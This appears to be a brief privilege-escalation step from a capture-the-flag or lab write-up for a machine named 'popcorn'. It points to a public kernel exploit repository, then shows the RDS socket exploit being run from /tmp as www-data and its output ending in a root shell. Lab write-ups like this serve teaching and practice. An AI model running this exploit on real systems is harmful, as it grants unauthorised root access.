6 privesc_2 rds

# Using https://github.com/lucyoa/kernel-exploits/tree/master/rds

www-data@popcorn:/tmp/k$ chmod +x rds
www-data@popcorn:/tmp/k$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc089b908
 [+] Resolved default_security_ops to 0xc075e2a0
 [+] Resolved cap_ptrace_traceme to 0xc02caf30
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami;id
root
uid=0(root) gid=0(root)

Last updated